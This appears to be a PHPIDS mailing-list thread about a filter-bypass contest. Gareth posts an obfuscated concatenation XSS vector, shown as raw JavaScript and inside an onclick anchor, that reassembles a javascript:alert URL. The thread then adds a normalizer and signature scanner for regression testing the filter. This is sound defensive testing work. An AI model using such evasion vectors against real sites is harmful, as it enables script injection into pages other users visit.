Hi!

After talking to Christian and SirDarckCat I decided to make this post - even if it may sound a little bit provocative ;) We spent lots of time with the rules and, except for some details, we are pretty content with them.
So if you like and find some time, give them a new try - anyone who manages to create an XSS on the demo page will be mentioned in the next release notes and will (if wanted) get a dedicated interview on the blog (SirDarckCat's interview will appear in the next days - he was again quicker than light with some vectors mentioned in the release post).
Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+
Any vector which is able to create an alert/content change via JS on the demo page counts - as long as a PoC of whatever form can be provided. A similar contest will follow in the next weeks for SQL Injection.

Greetings and have fun!
.mario
Make Giorgio's threesome a foursome. obj[name]() works as well, giving access to all top-level functions/objects. Low impact in general, but this might be combined with other things...
Now this is a strange one:-

h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':': 0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;

It should work because I tested it locally, however it doesn't seem to execute on your site. I've no idea why, maybe some characters are causing the onclick handler to produce invalid data. The code above gets past your filters though.

Tested this in Firefox locally and it worked:-

<a onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':': 0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;" href="?test=test">Test</a>
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> wrote:
> Yep - very nice and strange one indeed! But fixed. The concatenation algorithm has received a recode - hope that will stop the next wave ;)
I've written a simple script to conduct concatenation attacks, so if anyone wants to improve it or add new vectors please do and send them to the group. The reason I think it is needed is because of the amount of possible combinations, and having an automated tool like this would help with unit testing of the code. You never know when a vector could creep back in, you see.
Another thing I've thought about is JavaScript-based XSS protection. I don't know if this is outside the project's goal, but something like this would prevent window.name exploits:-
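Gareth's concatenation vector earlier in the thread and his point about unit testing the filter both call for a regression check. The following is an added example for this thread, not PHPIDS code and not Gareth's script: it folds the ''+'x'+'' padding, the ''==''?'x': 0 ternaries and the variable chaining back into plain strings, then scans raw and normalized forms with a few signatures. VECTOR is the payload posted above, embedded as constructed test input; the signature list is assumed.

```javascript
// Added example for this thread (not PHPIDS code, not Gareth's script): a
// normalizer that undoes the concatenation tricks in the vector above and
// scans the result, so a unit test can catch the vector creeping back in.
// The vector from the thread, embedded as a constructed test input.
const VECTOR = "h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';" +
  "s3=''+ 'pt'+'';s4=''==''?':': 0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)': 0;" +
  "s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;";
// Signatures a plain pattern filter might apply (assumed list for the demo).
const SIGNATURES = [/javascript\s*:/i, /alert\s*\(/i, /\bhref\b/i];

// Resolve always-true ternaries of the form ''==''?'x': 0 into 'x'.
function foldTrivialTernary(src) {
  return src.replace(/''\s*==\s*''\s*\?\s*'([^']*)'\s*:\s*0/g, "'$1'");
}
// Drop empty-string padding: ''+'hr'+'' becomes 'hr'.
function stripEmptyPadding(src) {
  return src.replace(/''\s*\+\s*/g, '').replace(/\s*\+\s*''/g, '');
}
// Merge adjacent literals until stable: 'jav'+'ascri'+'pt' becomes 'javascript'.
function mergeLiterals(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(/'([^']*)'\s*\+\s*'([^']*)'/g, "'$1$2'");
  } while (src !== prev);
  return src;
}
const fold = src => mergeLiterals(stripEmptyPadding(foldTrivialTernary(src)));

// Walk statements in order and resolve assignments whose right side is only
// literals and already-known names (h3=h1+h2); DOM lookups stay unresolved.
function resolveStrings(src) {
  const vars = {};
  for (const stmt of fold(src).split(';')) {
    const m = stmt.match(/^\s*([A-Za-z_$][\w$]*)\s*=\s*(.+?)\s*$/);
    if (!m) continue;
    const values = m[2].split('+').map(part => {
      const p = part.trim(), lit = p.match(/^'([^']*)'$/);
      if (lit) return lit[1];
      return Object.prototype.hasOwnProperty.call(vars, p) ? vars[p] : null;
    });
    if (values.every(v => v !== null)) vars[m[1]] = values.join('');
  }
  return vars;
}

// Scan the raw input and the normalized form (folded source plus resolved
// values); only the normalized form should match the signatures.
function scan(src) {
  const hits = text => SIGNATURES.filter(re => re.test(text)).map(re => re.source);
  const normalized = fold(src) + '\n' + Object.values(resolveStrings(src)).join('\n');
  return { raw: hits(src), normalized: hits(normalized) };
}
```

Run scan(VECTOR) in Node: the raw string matches nothing, while the normalized form matches all three signatures because s8 resolves to the reassembled javascript: URL and h3 to the property name it is written to.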
It's a good idea but it's way outside the project - the IDS will provide no protection - just monitoring and information on possible attacks. I had the PHPIPS idea in my head too for some time but there are so many other tools and ways to solve that...
> Which the PHPIDS could include in the header of the page.
> On Sep 10, 9:40 am, Gareth <gazhe...@gmail.com> wrote:
> > Hi All
> Mario: do you prefer these posted here or at sla.ckers or both?
> On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com> wrote:
> > Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for being in the right format to be executed.